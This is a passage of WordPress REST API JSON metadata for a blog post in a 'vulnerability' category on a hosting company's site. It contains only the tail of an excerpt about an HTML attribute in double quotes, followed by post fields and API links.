an HTML tag attribute which is encapsulated in double quotation marks. The &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-34594","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34594","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=34594"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34594\/revisions"}],"predecessor-version":[{"id":34596,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34594\/revisions\/34596"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=34594"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=34594"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=34594"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}